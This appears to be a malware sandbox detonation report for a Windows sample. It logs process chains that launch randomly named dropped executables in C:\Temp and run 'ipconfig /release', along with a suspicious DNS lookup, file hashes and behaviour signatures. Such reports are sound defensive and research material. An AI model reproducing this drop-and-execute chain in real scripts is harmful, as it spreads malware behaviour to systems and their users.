C:\temp\CreateProcess.exe C:\Temp\i_dysqlidxvp.exe ups_ins

C:\Temp\i_dysqlidxvp.exe

C:\Temp\i_dysqlidxvp.exe ups_ins

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\axsqkfcxup.exe ups_run

C:\Temp\axsqkfcxup.exe

C:\Temp\axsqkfcxup.exe ups_run

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release

C:\windows\system32\ipconfig.exe

C:\windows\system32\ipconfig.exe /release

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\i_axsqkfcxup.exe ups_ins

C:\Temp\i_axsqkfcxup.exe

C:\Temp\i_axsqkfcxup.exe ups_ins

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\usmkezwrpj.exe ups_run

C:\Temp\usmkezwrpj.exe

C:\Temp\usmkezwrpj.exe ups_run

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release

C:\windows\system32\ipconfig.exe

C:\windows\system32\ipconfig.exe /release

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\i_usmkezwrpj.exe ups_ins

C:\Temp\i_usmkezwrpj.exe

C:\Temp\i_usmkezwrpj.exe ups_ins

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\trmgeywqlj.exe ups_run

C:\Temp\trmgeywqlj.exe

C:\Temp\trmgeywqlj.exe ups_run

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release

C:\windows\system32\ipconfig.exe

C:\windows\system32\ipconfig.exe /release

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\i_trmgeywqlj.exe ups_ins

C:\Temp\i_trmgeywqlj.exe

C:\Temp\i_trmgeywqlj.exe ups_ins

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\wqlidbvqni.exe ups_run

C:\Temp\wqlidbvqni.exe

C:\Temp\wqlidbvqni.exe ups_run

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release

C:\windows\system32\ipconfig.exe

C:\windows\system32\ipconfig.exe /release

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\i_wqlidbvqni.exe ups_ins

C:\Temp\i_wqlidbvqni.exe

C:\Temp\i_wqlidbvqni.exe ups_ins

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\ysnlfdxspk.exe ups_run

C:\Temp\ysnlfdxspk.exe

C:\Temp\ysnlfdxspk.exe ups_run

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release

C:\windows\system32\ipconfig.exe

C:\windows\system32\ipconfig.exe /release

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\i_ysnlfdxspk.exe ups_ins

C:\Temp\i_ysnlfdxspk.exe

C:\Temp\i_ysnlfdxspk.exe ups_ins

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\upnhczusmg.exe ups_run

C:\Temp\upnhczusmg.exe

C:\Temp\upnhczusmg.exe ups_run

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release

C:\windows\system32\ipconfig.exe

C:\windows\system32\ipconfig.exe /release

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\i_upnhczusmg.exe ups_ins

C:\Temp\i_upnhczusmg.exe

C:\Temp\i_upnhczusmg.exe ups_ins

Network

Country Destination Domain Proto
US 8.8.8.8:53 xytets.com udp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp

Files

\Temp\ojgbvtnlgaysqkfd.exe

MD5 62d7f84f3f59b5aa4e5699e0229555f6
SHA1 d831ae491d3a8d1129ef99aebf876412529dd37f
SHA256 41dd1fb76d353be8b272623269346a9c7b45a8f3fd27916d5334c0f12de6b438
SHA512 997ed796611933a51a7b027970ae8c9aa72ae1d18c3ee5bd61459bf3cc030c8ae5299da49c9fe0af45b69f0ff16bb780f39924df11509e1883c53a76685f3093

\Temp\CreateProcess.exe

MD5 0dcd3f530356735b5c614568dd52ee57
SHA1 6e14c8776aa542004e84e73d04a157249b767dbb
SHA256 9b781d10953b5c97b2c3ad63c002b18a14b50bc333ff6286137112dea0ff09a8
SHA512 cf2206f806147346c9f8dcd71ae8eceaef76e141fc55f7bade76a6b1de7e44121a2888c3e414888b7426909f0fd6def8edc0da08beb05824ad6fef2cc2065ad5

C:\Temp\pkecwupjey.exe

MD5 354c3d4a101f203ab0ac6489009d1c61
SHA1 a622dca902245f4c982d89cc7bf4dd69a07c487e
SHA256 c19b5dc62a31196f70ce175f63cfb4f8dbe4b60123aaebc7fb01890455f82c92
SHA512 2519774adc9349b4cb437d5a558ccb7cadccddaa0f2565c7bda00c706d57da8e026ac4162150ab6ce943ac66f59f1133fb75888e6bd34c18bb5ea6779ff644a2

C:\Temp\i_pkecwupjey.exe

MD5 b41de74463a1839ece52343fb660a3f8
SHA1 35c4d6f3c75eeaf249007a17cf84762bf701575d
SHA256 be2041a400a46b9c7e97fefd3e25f7f217b8a82c332f788926c978785364c6f8
SHA512 b6fb662d6a6d1e8dd33c03288c4a271fc16c05d82896b7a9c975ef9a0da5b231383a22c51f557a404b777cef33a75b3723c4bd4abfb4bc4a62fd53dc0baf8917

C:\Temp\lgeysqlidx.exe

MD5 5d0601686fd65961c8ab4983c2948a70
SHA1 8f9fad54ba7e5de161f964903ebdca613eb49903
SHA256 a4f692681f877a7b666c8820dbaccad09ea128a2c2802717dd6ceb4f47482ac1
SHA512 b08a3e6b9e220a4f8dbba8fd4badce25c701c0182bbc4e08cfcfb597765f0c67613112bbbfba1d0d4323540ec9b9f5ce365a7acd3e3a795ce6651bdc24fdf495

C:\Users\Admin\AppData\Local\Temp\CabADCF.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\TarAEBE.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 2f1d0b4e87901ee59542a6933c299013
SHA1 23945fa3536accb6b501807b601bebb6bc633c82
SHA256 35b4f0c0af2760e659d3dfdae19567fef12f267067b31b072702db5acb058529
SHA512 34a55ab8bad1ca2ecdc14f6d08ddc35be075258e80dd1908ebf4ec8702eed4bcc6613736e410ea02485b74f9cf596830d649eaaf8594de2b265f3a46381cddec

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 8e77711fc9db466571e1b167450904d0
SHA1 e114cf62b3ec08e9ce66f7bf700de8239fe5f2bb
SHA256 61d96bda5e5593c46f7a6efc1ff3e20e74465c6acd5b0c5cf8afa06e67b1f4ee
SHA512 e07e1a217d4fda8efb74e2df534ddb788a315dc352cdd41c44c15820ff7c945d6c3cc970c290518df5234ee7e05bd9abdf4cc183d022684435d00212f20d4576

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 4f1e9f2a11e42372813f0540e08c3fbe
SHA1 11378e7274506c18b722fe17c1e3029f41bd10a9
SHA256 4a3aaba265a83ae8d1b54b63184e416b643b750b6262068a25dbdb5b5632e91d
SHA512 c436413a97b08bb04889fa78e86a91a2fbbdbf85730d004e98cb09399ee36a93a74e5e5520a4dcc5b47b6c12a6d76de40be60817b2dd22f249dcfbf0efb82b57

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 1f41702c3e281c6d2597011965d82641
SHA1 9b118f9db6c066e7c704402071ab0104bd99836f
SHA256 ba24a1ee6bb9b948ba2032764eb0ee8caaa4bf689991f8441c8380b7ff5b65b1
SHA512 83a81af1a9b5a9aebc2c147368e562cbb17b07d1574de8feabfb0c6704de8f8028fe2551c871fc040480fcfbecf853ca5415d85a7cb37b9a3356db068801f8eb

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 ebf791d5824bff38fbd13365da347451
SHA1 410f436edc3220ebb79585d80169450ca6b77a1e
SHA256 7cf3c980805c3d65ec1948ae5406429db4e4f2cb746e637df5cb4c6654d630c8
SHA512 b8212d32a28fe81a9fdc53c56a7417a6b4459c03426a56df76777de7aa34c44e95919791e20133a75cb08ba115144c4614dfe7614bdd448b49bf05be62832ea5

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 9c2b1ff8d75e086c0e3eb915538279d8
SHA1 af606e7482e66b0fca8170ee74c61f942b8692f7
SHA256 1fb342fcfe5d420abcca1d21c4108b0099747c66452f725c4b301f9476b64aaa
SHA512 b045eefbfcc779df920bacaae96fd645bca9dff0e234c82b084f614896fa3445a012a3d9232c5c1d2ad25c014fe311c22632a901b0b6e99265328d2ff3d75afa

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 79b0c96bfba2931a799eca2889daada9
SHA1 b08e5a29fb7125c44c27d3353b35717a8231b311
SHA256 e01b11fc6aa706a78bd948b67b571f6642faec929702f0ccc51636d13df311e8
SHA512 e73583d2e46c8ada094af668e034a2e83ce5f217bb6976535c157d58c74939c0c2843d52d11f6bfaa91d14208e5b102269ff8fb99ab289b4c62b30026b2f33c4

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 6c26b351d33f57598544a6375c022d97
SHA1 9b89de255cbbd38f8bdcc78cf4b366bcddd29f9c
SHA256 5c36fed000e4e41de3ed8f3585717d4dbc5d818563d7ca036ec6070708a4b1d6
SHA512 9732eafb1a0d4a950cc5909f599b2945ee017d030b64e87afd2f122284ede3c0021ed35bb7c6b770749149b6d7b9dd53f15fec9da03753d8261303f15d66bb6c

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 53c79a57c754e155827e7d3967fdda38
SHA1 53c99169f18a3e9426f02044504e1ebd1731de0c
SHA256 d8a044bcf9e6e3359334c503ea5717c15bb1ae4ea847c1ceec6be4aab8934757
SHA512 b60b63d059dc42388f7d8145514f30ada1af97121fad573e231f45907deedb0a8e9ca326748f577dfeb470bc410a32d93dbca5e5067e17e4dcc7a5e0f53513c8

C:\Temp\i_lgeysqlidx.exe

MD5 daf314b470f366f2ef5f4d4770609eb0
SHA1 ccaab4edba8bc6088845abaee762a76acd008e6d
SHA256 3a1f502192b9b254e0793c80ec2fee208877c744b4ef1d8cb2b7c06e9008fb12
SHA512 89e4f5dfdb79ce141c1262b08abf48a5eee9d5b9cb912ff4fceac378eec92f5f611af5ec68e8f1d2e7c1447cf183d659428cce31b5ff9e8d1d8fa9b87913f1e5

C:\Temp\cxrpkhcwuo.exe

MD5 dc7180203ca0ff4cd9a01cb1c704c642
SHA1 b48a8c1659a999bd0986f66b6445fd91045a8642
SHA256 520ea069f5d89554d72827625bd4ce1ddc2e84105f3a3bbb12ba1d300203e267
SHA512 a7872d64dc44679ab5226078113358ebe73d9a7c5fb58dde23ca327486a307861a722df96fc11650d9b853cdf27e59d07a484cc716f1a044862e64d5b79d2cd2

C:\Temp\i_cxrpkhcwuo.exe

MD5 528d9dcdd66a852af7d3b249356f3bdf
SHA1 02a8a6f0716a800a5018184cc2a4402504494a21
SHA256 50e5a2da3a456b67d5fecfb57e82936215e908e723f7022b83116a21ff121e5c
SHA512 a4d33c1fa1e8ebcc25df89cf2cdda97d1cd1c65ed92d2f98aa92ea6a713fe13dc316833d59a1a79d6d143ec91c9d0c19e1989ded0f8e005539e0864d57a9c6dd

C:\Temp\wupjhbztom.exe

MD5 f085c57ea68b19db508b378de5b368f3
SHA1 67e179dfb1c8457f796f02c57be7ca77ddb4ff4a
SHA256 24df1286dbf40d749882d4380f32f91be7e8981ce21290f071dc906edfcea206
SHA512 d223910cfbeff61c76e804de3cf6d61a26a1ddc8306e554559f37047f1a7674c65926a30f535c82e713b9b90abcb556d5fb1b7b23be35dfcc61f9ea3cbeabcec

C:\Temp\i_wupjhbztom.exe

MD5 de97875485ad024e1b28b60e83b94bee
SHA1 fb7728ccfcb1e9c277772eba363af3bc68c17140
SHA256 05c5c563b539355a202a54b864ff3d24aaa4c80b3a04ff735352c4e6188237dc
SHA512 ecb5a035937e8450714ee9fce1d7a34de97468636240ef9de2ca06526f4a5ce5a2c1548be6d3a6a64e03b60f8a99a5c3aefc7d9a93141495ca0568d57a00de86

C:\Temp\wqojgbvtnl.exe

MD5 13b9f61f667f5258f132dcdb0ec43dbd
SHA1 ddf82b96ee36514c7aae26cd84fdf7d67e314085
SHA256 cf87d3e6edece72f60898b3294abc9f2a2ff6c126657a655719399caed30fa46
SHA512 5ba2a4c837f27a5aee80fec59bddb15cd54016f6db277529c2f4734873d130848c08fd047b52691f95d281c161ed9a367b762ef3d5f172395409bb70f1e4b2a0

C:\Temp\i_wqojgbvtnl.exe

MD5 be937355df662b8d39d18bf91f5164cb
SHA1 799cb886f520533d8c1e8a16b36fc07c2b3f80b9
SHA256 33864a6a2ac8d8aa412f62a14cf07b12c5f396e467ddddfdd244fdfdd6d455eb
SHA512 6dfad0fe9cb7e20c36559010946f8a0f6aab3c588a082f1e8fed4a5b4cd35bdf843a84018121b9d33e6501d6920bbda86bfc268e465f0f4fd734bb81f0182d24

C:\Temp\nlfaysqkfc.exe

MD5 8b54aed8c9982a0447c17d25946f8cc2
SHA1 fc525b28ff2ae88c8afc54e104f5bdc084a5d733
SHA256 e2684e389d882f04bc7f5b93317f6608d6433ce96786c390f1a250ee41b5cc59
SHA512 3d7a2c86b7e3945030c96b1364599ccc8a8d6a35b06f6b68a02d6f52964912ccf0ac1709e9445faf2cfe20c52db48fe0de96a5d326320815a63a6a2b1bf35228

C:\Temp\i_nlfaysqkfc.exe

MD5 23e69d6c3bbe9fd2b69713bbdb52529c
SHA1 0befadd2bf300bcdf05b25f76176d8426834621f
SHA256 681a73dc4b919b1f27e6133b21293d4644cb484e692a86a57f76f93ee6608753
SHA512 bed4112d69f699ad911947105410a8d4e75a21080128e7f0e536b2823a445489932a7125d4a766de0935aff373adb8468ac2fdba1e40c31c1cc587d2a608bf6b

C:\Temp\caupmhfzur.exe

MD5 1f2701a7bfb8bc4ff54d9c9268d04c8a
SHA1 690ed76351ce1f40477b5c56676053e15e103479
SHA256 6dd1bbf5c62d5c730e5ebbd3b722db8df13654ed6f3756ecc2902c697dab42de
SHA512 f6eb01ad77b21d4e8ec42b912d56c443869b3eb2412643f1f667dc54334d1751bf3b2cb7055fa768edba2afb22c20fdffd5cea930f5d02b83b4bd91dfac46f59

C:\Temp\i_caupmhfzur.exe

MD5 9dbf217c86132ff02816fd741df60665
SHA1 8349cbb7236ea1257655a5ae095006efc654b1d9
SHA256 658463c383184cbd844ec1d30a56762baca74770570c0888cc0682c08cdd9bb5
SHA512 cfb555ffb08bad28262e87760ac80197d7b46a6548a764b25a7826f4b4d6e48ae44c65f16fa2ac3a0b1ea815bb0d4421eea4f3f0ee9dc7389e0d5aa888cb1bba

C:\Temp\rmgeywrljd.exe

MD5 d654145a1e98197d32417950e4511398
SHA1 7ff39f2509ead996bce9849112b22a6c37942d0f
SHA256 76cb0f6aa2c6c75f143caff093f40a36f562a092e4ef7cf37569faf4490d852d
SHA512 ef4e3839cc066392151fb63effa7eaf4f8dc6383c2101d1a8bd4de9d31886a740bb7ba5440b6d3594e243b8e2fcf87f66574f38aebc05a2269eedd383618839b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 5e69d8333b7ced3c23d30b182489153a
SHA1 e18e4ff8a92282baa41ce46fd5ea4095327bf529
SHA256 0f7136ab0885db215e3d63b672fbe6669d2ed99eb0cbac8dfdbd8680183e77b0
SHA512 e5546cbde24d94c4de383d8078c6a58d9107897a721ad46a96a619d419a004bc26c24e8ea43d02db78678a75509abd9438ecc0661a9f0ce2d28be769dec4bee1

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 7501b09641eacc4f206dac1c50a9df6d
SHA1 877800b8707da3dd76a0581bfd852ed6eb1604f0
SHA256 6b4bcb7905f71faca7e16b341d13e40f6216cc0bae2ab8e2b8046f7bd6122225
SHA512 748e5d1fa2050a90e4029593778b40e4b630dfca846e54cf0e62d30608142ab86e176d57f3de123cdded01e42323acacd7a1ec70676f529b1264e966d08daf49

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 ed9268aca781c8c4057bce611b9aa161
SHA1 dea97aaf2ce623b6c6a9958d2f453a1b5f9ce86f
SHA256 62919e92d04f8beb800fc5160a4bdccde4596bde9a64f56a00ab8c9ec8e7897e
SHA512 1c71a31df440dfb0939c946bdf46ffb798e7559f3bb41350bd7413a79846a7d28744828e68d0838773a4d0b8fd63593d5c0af10e5e65adb5ecd40fc6381bd531

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 aac2e25a2466a52d6a21cedbb517976c
SHA1 48e8a8a77b4a0266f6c8bb837c73ecde1350b5c7
SHA256 06074d1596109f93635c586849e36639375c49633efdde86edd26d9386d0d5c4
SHA512 e0e1158e40fddc5b38b575970bf10489b4556808acfe6112ee7e535f822e388b8297d165982036816407cb04b2513eb813a2954c1e64ae2e5e7bc08cc1b53e12

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 46688278e42093e8eec98919493acefb
SHA1 fe2adeeaf28c16ba51f50f2f981101d4721d664c
SHA256 59829f252d1702e58b395d078810451f9e73a91cb8c84e1139e586aff2252b4d
SHA512 baf62b87bce6ed45de361b292a81b8955b267e295f3bf3ce6481507ac7a95bdfcda51f2d0da66e37bfd90f45ffc3c930310ddf20c7a45909ea0534b3027fcff0

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 60d120539084a73d6ef45fce6b83ff5b
SHA1 b692abd5c2d2e05b2795dcfd6aad2584ece1b25a
SHA256 2a2a0db90f5d2622f4d4d669121e6b43bd5f812c693ce8eaf0aa101f06644826
SHA512 83641ad37c493654b069d084643e19de108b71e9ac517dd3e09f8fa514b5539a4f9b363bcba1dbab4ae9db297cb28ede211afb819a919826b13e25bc8f7d6501

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 2aa554e4c61e5bc9156b44778debdd03
SHA1 aabefb2b395bcf08dc3a32cfa5e0b4a47b4c7eda
SHA256 b7f1fd9b9f1f4ef85fd8798a5352b40f131c4c8164827d3e77a8ddc44abd0425
SHA512 07e2157d5624a04bc2c44e227fbec2e94901fd9da2f91784f0a40db60d4dd463e6250b810d4848afc9c67e5732367cd33fcad16c195b3af761ee283571a6dbc3

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 90e6f76c2b0e9c0dd58e332d6eb4819d
SHA1 067573a3fb06aa07218d501800594a94b056a181
SHA256 6fce3ba7a7b030d7d18dfaedea0d4166450ac0ad0579be302e54315dd21b262d
SHA512 b4e886ac03498969827150e60e4b389f6f08b7791eeb770b1e01ead11a8804064159b9f7d95b1e709590b54d6a14c123818ec8978d71a34e61abede498b637cf

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 45979d788cc3a7b8aae0782a93e8f904
SHA1 c99eb5584556a310fea41c11a6931cb15d28f265
SHA256 4df0ef2740762fedeadaaaf3e2d23d3e06f3f7a04a5df45258e39083f8bfdc32
SHA512 ae43d110d09bfff2df2be69997a6ee78097f1214cfc293c66924212d8189b5506f510199d6bd2cdffd3c7302522d2578f96b32569e35f05f3b61c1923b4eb538

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 6056e30a6a10ce91bcf0933fa53f69f4
SHA1 eaf0ff65fdee0ffdb9c30e3b60a9dcff8798f319
SHA256 2af12381c2ba3e57cb4dcfe8127cde82691a84ba3fa2aedbe664d08fb750e93b
SHA512 3384a733015166b351498e29285c0ccc9f103beb80826de8829623904269ea39fa4d80947cfc2e4104a329a394a3585e4165b23c9dd80ec302b71ad49e2ed07f

Analysis: behavioral2

Detonation Overview

Submitted

2025-01-27 20:34

Reported

2025-01-28 02:49

Platform

win10v2004-20241007-en

Max time kernel

149s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe"

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Temp\dxvpnifaysqkicav.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\kicavpnhfa.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\i_kicavpnhfa.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\kfzxrpkhcz.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\i_kfzxrpkhcz.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\zusmkecwup.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\i_zusmkecwup.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\zxrpjhczur.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\i_zxrpjhczur.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\trljebwuom.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\i_trljebwuom.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\ojgbztrljd.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\i_ojgbztrljd.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\oigtqljdbv.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\i_oigtqljdbv.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\fdyvqnigay.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\i_fdyvqnigay.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\axsqkicaus.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\i_axsqkicaus.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\usmkfcxvpn.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\i_usmkfcxvpn.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\zxspkicamk.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\i_zxspkicamk.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\xrpjhczusm.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\i_xrpjhczusm.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\uomgezwroj.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\zxrpjhczur.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\oigtqljdbv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\i_rljdbwtomg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\upnhfzxspk.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\zusmkecwup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\trljebwuom.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\zxspkicamk.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\i_uomgezwroj.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\kicavpnhfa.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\i_qnigaysqki.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\i_zxrpjhczur.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\i_oigtqljdbv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\uomgezwroj.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\wqoigbytql.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\ojgbztrljd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\fdyvqnigay.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\axsqkicaus.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\i_zxspkicamk.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\dxvpnifaysqkicav.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\temp\CreateProcess.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\i_kicavpnhfa.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\i_trljebwuom.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\xrpjhczusm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\rljdbwtomg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\qkicausnkf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\i_smkecwupmh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\i_kfzxrpkhcz.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\i_xrpjhczusm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\i_wqoigbytql.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\smkecwupmh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\i_upnhfzxspk.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe N/A
